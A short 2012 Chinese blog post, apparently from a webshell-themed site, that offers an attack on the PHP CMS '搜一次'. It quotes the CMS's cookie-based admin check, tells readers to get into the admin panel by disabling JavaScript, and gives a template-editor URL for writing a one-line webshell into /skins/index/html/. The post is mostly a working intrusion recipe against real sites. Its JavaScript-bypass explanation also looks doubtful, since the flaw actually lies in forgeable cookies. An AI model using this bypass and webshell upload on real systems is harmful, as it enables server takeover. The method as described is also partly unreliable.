搜一次 cms php 通杀

分类:安全 | 2012-03-5 | 撸过 77 次
1人扯谈

洞文件 admin 目录下的 admin_loginstate.php

看代码

if(empty($_COOKIE['S_AdminID'])){
  echo "<script>window.location='admin_login.php'</script>";
  exit;
  }
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){
  echo "<script>window.parent.location='admin_login.php'</script>";
  exit;
  }
?>

很简单的看出来是 cookie验证 我们直接禁止JS可直接进后台

进后台后简单的说下拿shell的方法

/admin/admin_template.php?action=templist&path=../skins/index/html/&tempname=默认模版&file=qingshen.php

直接访问这个url 然后写个一句话就可以了 目录当然是在 /skins/index/html/ 目录下的

话说小弟刚来 管理不给加点银子么

本站内容均为原创,转载请务必保留署名与链接!
搜一次 cms php 通杀:https://www.webshell.cc/3312.html
标签: ,

相关日志